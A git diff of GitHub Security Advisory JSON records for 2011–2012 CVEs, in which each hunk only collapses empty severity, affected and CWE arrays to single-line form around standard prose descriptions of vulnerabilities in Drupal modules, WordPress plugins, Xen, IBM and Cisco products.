a/advisories/unreviewed/2022/05/GHSA-gvj3-7p38-j75v/GHSA-gvj3-7p38-j75v.json b/advisories/unreviewed/2022/05/GHSA-gvj3-7p38-j75v/GHSA-gvj3-7p38-j75v.json index df74c225f1d..0aee5d96b37 100644 --- a/advisories/unreviewed/2022/05/GHSA-gvj3-7p38-j75v/GHSA-gvj3-7p38-j75v.json +++ b/advisories/unreviewed/2022/05/GHSA-gvj3-7p38-j75v/GHSA-gvj3-7p38-j75v.json @@ -7,12 +7,8 @@ "CVE-2012-0949" ], "details": "The Apport hook in Update Manager as used by Ubuntu 12.04 LTS, 11.10, and 11.04 uploads certain system state archive files when reporting bugs to Launchpad, which allows remote attackers to read repository credentials by viewing a public bug report.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-gw25-hcr4-7p5h/GHSA-gw25-hcr4-7p5h.json b/advisories/unreviewed/2022/05/GHSA-gw25-hcr4-7p5h/GHSA-gw25-hcr4-7p5h.json index 8a2d8225699..393803e0be5 100644 --- a/advisories/unreviewed/2022/05/GHSA-gw25-hcr4-7p5h/GHSA-gw25-hcr4-7p5h.json +++ b/advisories/unreviewed/2022/05/GHSA-gw25-hcr4-7p5h/GHSA-gw25-hcr4-7p5h.json @@ -7,12 +7,8 @@ "CVE-2012-3496" ], "details": "XENMEM_populate_physmap in Xen 4.0, 4.1, and 4.2, and Citrix XenServer 6.0.2 and earlier, when translating paging mode is not used, allows local PV OS guest kernels to cause a denial of service (BUG triggered and host crash) via invalid flags such as MEMF_populate_on_demand.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -112,9 +108,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-gxvh-83fg-whmm/GHSA-gxvh-83fg-whmm.json b/advisories/unreviewed/2022/05/GHSA-gxvh-83fg-whmm/GHSA-gxvh-83fg-whmm.json index 73034697a1c..e3a760162d4 100644 --- a/advisories/unreviewed/2022/05/GHSA-gxvh-83fg-whmm/GHSA-gxvh-83fg-whmm.json +++ b/advisories/unreviewed/2022/05/GHSA-gxvh-83fg-whmm/GHSA-gxvh-83fg-whmm.json @@ -7,12 +7,8 @@ "CVE-2012-2409" ], "details": "Buffer overflow in RealNetworks RealPlayer before 15.0.6.14, RealPlayer SP 1.0 through 1.1.5, and Mac RealPlayer before 12.0.1.1750 allows remote attackers to cause a denial of service or possibly have unspecified other impact via a crafted RealMedia file, a different vulnerability than CVE-2012-2410.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h2v8-g64c-6cg2/GHSA-h2v8-g64c-6cg2.json b/advisories/unreviewed/2022/05/GHSA-h2v8-g64c-6cg2/GHSA-h2v8-g64c-6cg2.json index 4af746e8f3b..f23345894a1 100644 --- a/advisories/unreviewed/2022/05/GHSA-h2v8-g64c-6cg2/GHSA-h2v8-g64c-6cg2.json +++ b/advisories/unreviewed/2022/05/GHSA-h2v8-g64c-6cg2/GHSA-h2v8-g64c-6cg2.json @@ -7,12 +7,8 @@ "CVE-2012-2251" ], "details": "rssh 2.3.2, as used by Debian, Fedora, and others, when the rsync protocol is enabled, allows local users to bypass intended restricted shell access via a (1) \"-e\" or (2) \"--\" command line option.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h377-8345-m527/GHSA-h377-8345-m527.json b/advisories/unreviewed/2022/05/GHSA-h377-8345-m527/GHSA-h377-8345-m527.json index b6dc25f67fe..907de98a337 100644 --- a/advisories/unreviewed/2022/05/GHSA-h377-8345-m527/GHSA-h377-8345-m527.json +++ b/advisories/unreviewed/2022/05/GHSA-h377-8345-m527/GHSA-h377-8345-m527.json @@ -7,12 +7,8 @@ "CVE-2011-5187" ], "details": "Cross-site scripting (XSS) vulnerability in the Support Ticketing System module 6.x-1.x before 6.x-1.7 for Drupal allows remote authenticated users with the \"administer support projects\" permission to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h44f-xp3m-jxrx/GHSA-h44f-xp3m-jxrx.json b/advisories/unreviewed/2022/05/GHSA-h44f-xp3m-jxrx/GHSA-h44f-xp3m-jxrx.json index 5f262bfc6f5..2c31d0dcb4f 100644 --- a/advisories/unreviewed/2022/05/GHSA-h44f-xp3m-jxrx/GHSA-h44f-xp3m-jxrx.json +++ b/advisories/unreviewed/2022/05/GHSA-h44f-xp3m-jxrx/GHSA-h44f-xp3m-jxrx.json @@ -7,12 +7,8 @@ "CVE-2012-1506" ], "details": "SQL injection vulnerability in the updateStatus function in lib/models/benefits/Hsp.php in OrangeHRM before 2.7 allows remote authenticated users to execute arbitrary SQL commands via the hspSummaryId parameter to plugins/ajaxCalls/haltResumeHsp.php. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h469-86gw-qh7q/GHSA-h469-86gw-qh7q.json b/advisories/unreviewed/2022/05/GHSA-h469-86gw-qh7q/GHSA-h469-86gw-qh7q.json index 96af96b54d8..44a6dd3493b 100644 --- a/advisories/unreviewed/2022/05/GHSA-h469-86gw-qh7q/GHSA-h469-86gw-qh7q.json +++ b/advisories/unreviewed/2022/05/GHSA-h469-86gw-qh7q/GHSA-h469-86gw-qh7q.json @@ -7,12 +7,8 @@ "CVE-2012-1218" ], "details": "Multiple SQL injection vulnerabilities in freelancerKit 2.35 allow remote attackers to execute arbitrary SQL commands via unspecified vectors to the (1) notes and (2) tickets components.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h4pm-r4q8-84hf/GHSA-h4pm-r4q8-84hf.json b/advisories/unreviewed/2022/05/GHSA-h4pm-r4q8-84hf/GHSA-h4pm-r4q8-84hf.json index 7c636dcb81f..08c947a3c1e 100644 --- a/advisories/unreviewed/2022/05/GHSA-h4pm-r4q8-84hf/GHSA-h4pm-r4q8-84hf.json +++ b/advisories/unreviewed/2022/05/GHSA-h4pm-r4q8-84hf/GHSA-h4pm-r4q8-84hf.json @@ -7,12 +7,8 @@ "CVE-2012-3111" ], "details": "Unspecified vulnerability in the PeopleSoft Enterprise PeopleTools component in Oracle PeopleSoft Products 8.50, 8.51, and 8.52 allows remote authenticated users to affect integrity, related to TECH, a different vulnerability than CVE-2012-1762.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h4qq-2j4v-765m/GHSA-h4qq-2j4v-765m.json b/advisories/unreviewed/2022/05/GHSA-h4qq-2j4v-765m/GHSA-h4qq-2j4v-765m.json index 6aa06b85816..9ae47c4aefa 100644 --- a/advisories/unreviewed/2022/05/GHSA-h4qq-2j4v-765m/GHSA-h4qq-2j4v-765m.json +++ b/advisories/unreviewed/2022/05/GHSA-h4qq-2j4v-765m/GHSA-h4qq-2j4v-765m.json @@ -7,12 +7,8 @@ "CVE-2012-2339" ], "details": "Cross-site scripting (XSS) vulnerability in the Glossary module 6.x-1.x before 6.x-1.8 for Drupal allows remote attackers to inject arbitrary web script or HTML via unspecified vectors related to \"taxonomy information.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h5jh-rmm4-h55j/GHSA-h5jh-rmm4-h55j.json b/advisories/unreviewed/2022/05/GHSA-h5jh-rmm4-h55j/GHSA-h5jh-rmm4-h55j.json index 438e6b9b975..eddd8f1100e 100644 --- a/advisories/unreviewed/2022/05/GHSA-h5jh-rmm4-h55j/GHSA-h5jh-rmm4-h55j.json +++ b/advisories/unreviewed/2022/05/GHSA-h5jh-rmm4-h55j/GHSA-h5jh-rmm4-h55j.json @@ -7,12 +7,8 @@ "CVE-2012-2298" ], "details": "Multiple cross-site scripting (XSS) vulnerabilities in the RealName module 6.x-1.x before 6.x-1.5 for Drupal allow remote attackers to inject arbitrary web script or HTML via vectors related to (1) \"user names in page titles\" and (2) \"autocomplete callbacks.\"", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h6fj-j4mh-7x7h/GHSA-h6fj-j4mh-7x7h.json b/advisories/unreviewed/2022/05/GHSA-h6fj-j4mh-7x7h/GHSA-h6fj-j4mh-7x7h.json index 1593d620e81..c17e01d1a4d 100644 --- a/advisories/unreviewed/2022/05/GHSA-h6fj-j4mh-7x7h/GHSA-h6fj-j4mh-7x7h.json +++ b/advisories/unreviewed/2022/05/GHSA-h6fj-j4mh-7x7h/GHSA-h6fj-j4mh-7x7h.json @@ -7,12 +7,8 @@ "CVE-2012-1151" ], "details": "Multiple format string vulnerabilities in dbdimp.c in DBD::Pg (aka DBD-Pg or libdbd-pg-perl) module before 2.19.0 for Perl allow remote PostgreSQL database servers to cause a denial of service (process crash) via format string specifiers in (1) a crafted database warning to the pg_warn function or (2) a crafted DBD statement to the dbd_st_prepare function.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h72j-cvrp-x3v5/GHSA-h72j-cvrp-x3v5.json b/advisories/unreviewed/2022/05/GHSA-h72j-cvrp-x3v5/GHSA-h72j-cvrp-x3v5.json index 22699e100c3..a6fbe3fedcd 100644 --- a/advisories/unreviewed/2022/05/GHSA-h72j-cvrp-x3v5/GHSA-h72j-cvrp-x3v5.json +++ b/advisories/unreviewed/2022/05/GHSA-h72j-cvrp-x3v5/GHSA-h72j-cvrp-x3v5.json @@ -7,12 +7,8 @@ "CVE-2011-5264" ], "details": "Cross-site scripting (XSS) vulnerability in lazyest-backup.php in the Lazyest Backup plugin before 0.2.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xml_or_all parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h748-pv4x-h2jc/GHSA-h748-pv4x-h2jc.json b/advisories/unreviewed/2022/05/GHSA-h748-pv4x-h2jc/GHSA-h748-pv4x-h2jc.json index d07f66cf85b..b7ac269e5ca 100644 --- a/advisories/unreviewed/2022/05/GHSA-h748-pv4x-h2jc/GHSA-h748-pv4x-h2jc.json +++ b/advisories/unreviewed/2022/05/GHSA-h748-pv4x-h2jc/GHSA-h748-pv4x-h2jc.json @@ -7,12 +7,8 @@ "CVE-2012-0981" ], "details": "Directory traversal vulnerability in phpShowtime 2.0 allows remote attackers to list arbitrary directories and image files via a .. (dot dot) in the r parameter to index.php. NOTE: Some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h74x-c3x7-3jxx/GHSA-h74x-c3x7-3jxx.json b/advisories/unreviewed/2022/05/GHSA-h74x-c3x7-3jxx/GHSA-h74x-c3x7-3jxx.json index 143f0e13269..5c1efd5554d 100644 --- a/advisories/unreviewed/2022/05/GHSA-h74x-c3x7-3jxx/GHSA-h74x-c3x7-3jxx.json +++ b/advisories/unreviewed/2022/05/GHSA-h74x-c3x7-3jxx/GHSA-h74x-c3x7-3jxx.json @@ -7,12 +7,8 @@ "CVE-2012-4060" ], "details": "Multiple SQL injection vulnerabilities in ASP-DEv XM Forums RC3 allow remote attackers to execute arbitrary SQL commands via the id parameter to (1) profile.asp, (2) forum.asp, or (3) topic.asp.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h78c-f929-fmwg/GHSA-h78c-f929-fmwg.json b/advisories/unreviewed/2022/05/GHSA-h78c-f929-fmwg/GHSA-h78c-f929-fmwg.json index c84af220844..2b2053c0a10 100644 --- a/advisories/unreviewed/2022/05/GHSA-h78c-f929-fmwg/GHSA-h78c-f929-fmwg.json +++ b/advisories/unreviewed/2022/05/GHSA-h78c-f929-fmwg/GHSA-h78c-f929-fmwg.json @@ -7,12 +7,8 @@ "CVE-2012-1200" ], "details": "Multiple PHP remote file inclusion vulnerabilities in Nova CMS allow remote attackers to execute arbitrary PHP code via a URL in the (1) fileType parameter to optimizer/index.php, (2) id parameter to administrator/modules/moduleslist.php, (3) filename parameter to includes/function/gets.php, or (4) conf[blockfile] parameter to includes/function/usertpl.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-h7qj-m6r2-68cc/GHSA-h7qj-m6r2-68cc.json b/advisories/unreviewed/2022/05/GHSA-h7qj-m6r2-68cc/GHSA-h7qj-m6r2-68cc.json index fc428976148..9712e3d1f59 100644 --- a/advisories/unreviewed/2022/05/GHSA-h7qj-m6r2-68cc/GHSA-h7qj-m6r2-68cc.json +++ b/advisories/unreviewed/2022/05/GHSA-h7qj-m6r2-68cc/GHSA-h7qj-m6r2-68cc.json @@ -7,12 +7,8 @@ "CVE-2012-2752" ], "details": "Untrusted search path vulnerability in VMware vMA 4.x and 5.x before 5.0.0.2 allows local users to gain privileges via a Trojan horse DLL in the current working directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -48,9 +44,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h856-rhx4-x88c/GHSA-h856-rhx4-x88c.json b/advisories/unreviewed/2022/05/GHSA-h856-rhx4-x88c/GHSA-h856-rhx4-x88c.json index 8d3ff9a2567..be482af4a5e 100644 --- a/advisories/unreviewed/2022/05/GHSA-h856-rhx4-x88c/GHSA-h856-rhx4-x88c.json +++ b/advisories/unreviewed/2022/05/GHSA-h856-rhx4-x88c/GHSA-h856-rhx4-x88c.json @@ -7,12 +7,8 @@ "CVE-2012-1011" ], "details": "actions.php in the AllWebMenus plugin 1.1.8 for WordPress allows remote attackers to bypass intended access restrictions to upload and execute arbitrary PHP code by setting the HTTP_REFERER to a certain value, then uploading a ZIP file containing a PHP file, then accessing it via a direct request to the file in an unspecified directory.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-h93p-v9jf-r4xm/GHSA-h93p-v9jf-r4xm.json b/advisories/unreviewed/2022/05/GHSA-h93p-v9jf-r4xm/GHSA-h93p-v9jf-r4xm.json index 4e8553737e0..2fade7e10fe 100644 --- a/advisories/unreviewed/2022/05/GHSA-h93p-v9jf-r4xm/GHSA-h93p-v9jf-r4xm.json +++ b/advisories/unreviewed/2022/05/GHSA-h93p-v9jf-r4xm/GHSA-h93p-v9jf-r4xm.json @@ -7,12 +7,8 @@ "CVE-2012-0936" ], "details": "Cross-site scripting (XSS) vulnerability in web/springframework/security/SecurityAuthenticationEventOnmsEventBuilder.java in OpenNMS 1.8.x before 1.8.17, 1.9.93 and earlier, and 1.10.x before 1.10.1 allows remote attackers to inject arbitrary web script or HTML via the Username field, related to login.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hfw5-2294-7q36/GHSA-hfw5-2294-7q36.json b/advisories/unreviewed/2022/05/GHSA-hfw5-2294-7q36/GHSA-hfw5-2294-7q36.json index 63187e5a2b5..4cc721ec72a 100644 --- a/advisories/unreviewed/2022/05/GHSA-hfw5-2294-7q36/GHSA-hfw5-2294-7q36.json +++ b/advisories/unreviewed/2022/05/GHSA-hfw5-2294-7q36/GHSA-hfw5-2294-7q36.json @@ -7,12 +7,8 @@ "CVE-2012-1580" ], "details": "Cross-site request forgery (CSRF) vulnerability in Special:Upload in MediaWiki 1.17.x before 1.17.3 and 1.18.x before 1.18.2 allows remote attackers to hijack the authentication of unspecified victims for requests that upload files.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hgm2-x96p-g52q/GHSA-hgm2-x96p-g52q.json b/advisories/unreviewed/2022/05/GHSA-hgm2-x96p-g52q/GHSA-hgm2-x96p-g52q.json index fa8fda29250..068a6738736 100644 --- a/advisories/unreviewed/2022/05/GHSA-hgm2-x96p-g52q/GHSA-hgm2-x96p-g52q.json +++ b/advisories/unreviewed/2022/05/GHSA-hgm2-x96p-g52q/GHSA-hgm2-x96p-g52q.json @@ -7,12 +7,8 @@ "CVE-2011-5188" ], "details": "Cross-site scripting (XSS) vulnerability in the Support Timer module 6.x-1.x before 6.x-1.4 for Drupal allows remote authenticated users with the \"track time spent\" permission to inject arbitrary web script or HTML via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hgmc-pjc5-rw9x/GHSA-hgmc-pjc5-rw9x.json b/advisories/unreviewed/2022/05/GHSA-hgmc-pjc5-rw9x/GHSA-hgmc-pjc5-rw9x.json index dabe11ce84e..0f14835616f 100644 --- a/advisories/unreviewed/2022/05/GHSA-hgmc-pjc5-rw9x/GHSA-hgmc-pjc5-rw9x.json +++ b/advisories/unreviewed/2022/05/GHSA-hgmc-pjc5-rw9x/GHSA-hgmc-pjc5-rw9x.json @@ -7,12 +7,8 @@ "CVE-2012-3369" ], "details": "The CallerIdentityLoginModule in JBoss Enterprise Application Platform (EAP) before 5.2.0, Web Platform (EWP) before 5.2.0, BRMS Platform before 5.3.1, and SOA Platform before 5.3.1 allows remote attackers to gain privileges of the previous user via a null password, which causes the previous user's password to be used.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -84,9 +80,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hgmh-c94j-69fp/GHSA-hgmh-c94j-69fp.json b/advisories/unreviewed/2022/05/GHSA-hgmh-c94j-69fp/GHSA-hgmh-c94j-69fp.json index 7b12bcbee27..b6d9786d530 100644 --- a/advisories/unreviewed/2022/05/GHSA-hgmh-c94j-69fp/GHSA-hgmh-c94j-69fp.json +++ b/advisories/unreviewed/2022/05/GHSA-hgmh-c94j-69fp/GHSA-hgmh-c94j-69fp.json @@ -7,12 +7,8 @@ "CVE-2012-1028" ], "details": "Cross-site scripting (XSS) vulnerability in bin/index.php in SimpleGroupware 0.742 and other versions before 0.743 allows remote attackers to inject arbitrary web script or HTML via the export parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hj49-c58v-8jc2/GHSA-hj49-c58v-8jc2.json b/advisories/unreviewed/2022/05/GHSA-hj49-c58v-8jc2/GHSA-hj49-c58v-8jc2.json index bb7058cec46..77f3fed16da 100644 --- a/advisories/unreviewed/2022/05/GHSA-hj49-c58v-8jc2/GHSA-hj49-c58v-8jc2.json +++ b/advisories/unreviewed/2022/05/GHSA-hj49-c58v-8jc2/GHSA-hj49-c58v-8jc2.json @@ -7,12 +7,8 @@ "CVE-2012-2199" ], "details": "The server message channel agent in the queue manager in the server in IBM WebSphere MQ 7.0.1 before 7.0.1.9, 7.1, and 7.5 on Solaris allows remote attackers to cause a denial of service (invalid address alignment exception and daemon crash) via vectors involving a multiplexed channel.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -32,9 +28,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hjfm-g5wv-76g4/GHSA-hjfm-g5wv-76g4.json b/advisories/unreviewed/2022/05/GHSA-hjfm-g5wv-76g4/GHSA-hjfm-g5wv-76g4.json index 290e15d7dc9..8bc9c1d9c3a 100644 --- a/advisories/unreviewed/2022/05/GHSA-hjfm-g5wv-76g4/GHSA-hjfm-g5wv-76g4.json +++ b/advisories/unreviewed/2022/05/GHSA-hjfm-g5wv-76g4/GHSA-hjfm-g5wv-76g4.json @@ -7,12 +7,8 @@ "CVE-2012-3328" ], "details": "Cross-site scripting (XSS) vulnerability in IBM Maximo Asset Management 7.1, Maximo Asset Management Essentials 7.1, Tivoli Asset Management for IT 7.1 and 7.2, Tivoli Service Request Manager 7.1 and 7.2, and Change and Configuration Management Database (CCMDB) 7.1 and 7.2 allows remote attackers to inject arbitrary web script or HTML via vectors related to a hidden frame footer.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hjvh-7gx8-qgjv/GHSA-hjvh-7gx8-qgjv.json b/advisories/unreviewed/2022/05/GHSA-hjvh-7gx8-qgjv/GHSA-hjvh-7gx8-qgjv.json index 7f10bdd309e..2b66444461a 100644 --- a/advisories/unreviewed/2022/05/GHSA-hjvh-7gx8-qgjv/GHSA-hjvh-7gx8-qgjv.json +++ b/advisories/unreviewed/2022/05/GHSA-hjvh-7gx8-qgjv/GHSA-hjvh-7gx8-qgjv.json @@ -7,12 +7,8 @@ "CVE-2012-1125" ], "details": "Unrestricted file upload vulnerability in uploadify/scripts/uploadify.php in the Kish Guest Posting plugin before 1.2 for WordPress allows remote attackers to execute arbitrary code by uploading a file with a PHP extension, then accessing it via a direct request to the file in the directory specified by the folder parameter.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -64,9 +60,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hm7q-6fv8-j3p6/GHSA-hm7q-6fv8-j3p6.json b/advisories/unreviewed/2022/05/GHSA-hm7q-6fv8-j3p6/GHSA-hm7q-6fv8-j3p6.json index 919d9bc35ad..6958956b4ea 100644 --- a/advisories/unreviewed/2022/05/GHSA-hm7q-6fv8-j3p6/GHSA-hm7q-6fv8-j3p6.json +++ b/advisories/unreviewed/2022/05/GHSA-hm7q-6fv8-j3p6/GHSA-hm7q-6fv8-j3p6.json @@ -7,12 +7,8 @@ "CVE-2012-2296" ], "details": "The Janrain Engage (formerly RPX) module for Drupal 6.x-1.x. 6.x-2.x before 6.x-2.2, and 7.x-2.x before 7.x-2.2 stores user profile data from Engage in session tables, which might allow remote attackers to obtain sensitive information by leveraging a separate vulnerability.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hq28-vq28-wfpf/GHSA-hq28-vq28-wfpf.json b/advisories/unreviewed/2022/05/GHSA-hq28-vq28-wfpf/GHSA-hq28-vq28-wfpf.json index 36f7d2bcf48..dd2a2eae819 100644 --- a/advisories/unreviewed/2022/05/GHSA-hq28-vq28-wfpf/GHSA-hq28-vq28-wfpf.json +++ b/advisories/unreviewed/2022/05/GHSA-hq28-vq28-wfpf/GHSA-hq28-vq28-wfpf.json @@ -7,12 +7,8 @@ "CVE-2012-1199" ], "details": "Multiple PHP remote file inclusion vulnerabilities in Basic Analysis and Security Engine (BASE) 1.4.5 allow remote attackers to execute arbitrary PHP code via a URL in the (1) BASE_path parameter to base_ag_main.php, (2) base_db_setup.php, (3) base_graph_common.php, (4) base_graph_display.php, (5) base_graph_form.php, (6) base_graph_main.php, (7) base_local_rules.php, (8) base_logout.php, (9) base_main.php, (10) base_maintenance.php, (11) base_payload.php, (12) base_qry_alert.php, (13) base_qry_common.php, (14) base_qry_main.php, (15) base_stat_alerts.php, (16) base_stat_class.php, (17) base_stat_common.php, (18) base_stat_ipaddr.php, (19) base_stat_iplink.php, (20) base_stat_ports.php, (21) base_stat_sensor.php, (22) base_stat_time.php, (23) base_stat_uaddr.php, (24) base_user.php, (25) index.php, (26) admin/base_roleadmin.php, (27) admin/base_useradmin.php, (28) admin/index.php, (29) help/base_setup_help.php, (30) includes/base_action.inc.php, (31) includes/base_cache.inc.php, (32) includes/base_db.inc.php, (33) includes/base_db.inc.php, (34) includes/base_include.inc.php, (35) includes/base_output_html.inc.php, (36) includes/base_output_query.inc.php, (37) includes/base_state_criteria.inc.php, (38) includes/base_state_query.inc.php or (39) setup/base_conf_contents.php; (40) GLOBALS[user_session_path] parameter to includes/base_state_common.inc.php; (41) BASE_Language parameter to setup/base_conf_contents.php; or (42) ado_inc_php parameter to setup/setup2.php.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hr4g-gcr7-8xp6/GHSA-hr4g-gcr7-8xp6.json b/advisories/unreviewed/2022/05/GHSA-hr4g-gcr7-8xp6/GHSA-hr4g-gcr7-8xp6.json index ab1ec107892..eee17f05fe7 100644 --- a/advisories/unreviewed/2022/05/GHSA-hr4g-gcr7-8xp6/GHSA-hr4g-gcr7-8xp6.json +++ b/advisories/unreviewed/2022/05/GHSA-hr4g-gcr7-8xp6/GHSA-hr4g-gcr7-8xp6.json @@ -7,12 +7,8 @@ "CVE-2012-4090" ], "details": "The management interface in Cisco NX-OS on Nexus 7000 devices allows remote authenticated users to obtain sensitive configuration-file information by leveraging the network-operator role, aka Bug ID CSCti09089.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -44,9 +40,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hrhj-vx9r-6g9j/GHSA-hrhj-vx9r-6g9j.json b/advisories/unreviewed/2022/05/GHSA-hrhj-vx9r-6g9j/GHSA-hrhj-vx9r-6g9j.json index b8ea4c224af..b36c074e017 100644 --- a/advisories/unreviewed/2022/05/GHSA-hrhj-vx9r-6g9j/GHSA-hrhj-vx9r-6g9j.json +++ b/advisories/unreviewed/2022/05/GHSA-hrhj-vx9r-6g9j/GHSA-hrhj-vx9r-6g9j.json @@ -7,12 +7,8 @@ "CVE-2012-3325" ], "details": "IBM WebSphere Application Server (WAS) 6.1.x before 6.1.0.45, 7.0.x before 7.0.0.25, 8.0.x before 8.0.0.5, and 8.5.x Full Profile before 8.5.0.1, when the PM44303 fix is installed, does not properly validate credentials, which allows remote authenticated users to obtain administrative access via unspecified vectors.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", diff --git a/advisories/unreviewed/2022/05/GHSA-hrhq-658c-r72w/GHSA-hrhq-658c-r72w.json b/advisories/unreviewed/2022/05/GHSA-hrhq-658c-r72w/GHSA-hrhq-658c-r72w.json index 6d013c1ba67..d8a64f94f87 100644 --- a/advisories/unreviewed/2022/05/GHSA-hrhq-658c-r72w/GHSA-hrhq-658c-r72w.json +++ b/advisories/unreviewed/2022/05/GHSA-hrhq-658c-r72w/GHSA-hrhq-658c-r72w.json @@ -7,12 +7,8 @@ "CVE-2012-2320" ], "details": "ConnMan before 0.85 does not ensure that netlink messages originate from the kernel, which allows remote attackers to bypass intended access restrictions and cause a denial of service via a crafted netlink message.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { "type": "ADVISORY", @@ -68,9 +64,7 @@ } ], "database_specific": { - "cwe_ids": [ - - ], + "cwe_ids": [], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-hv38-h7xw-2jmc/GHSA-hv38-h7xw-2jmc.json b/advisories/unreviewed/2022/05/GHSA-hv38-h7xw-2jmc/GHSA-hv38-h7xw-2jmc.json index 42d14e1e584..2e013cc9893 100644 --- a/advisories/unreviewed/2022/05/GHSA-hv38-h7xw-2jmc/GHSA-hv38-h7xw-2jmc.json +++ b/advisories/unreviewed/2022/05/GHSA-hv38-h7xw-2jmc/GHSA-hv38-h7xw-2jmc.json @@ -7,12 +7,8 @@ "CVE-2011-5203" ], "details": "SQL injection vulnerability in WB/Default.asp in Akiva WebBoard before 8 SR 1 allows remote attackers to execute arbitrary SQL commands via the name parameter. NOTE: some of these details are obtained from third party information.", - "severity": [ - - ], - "affected": [ - - ], + "severity": [], + "affected": [], "references": [ { 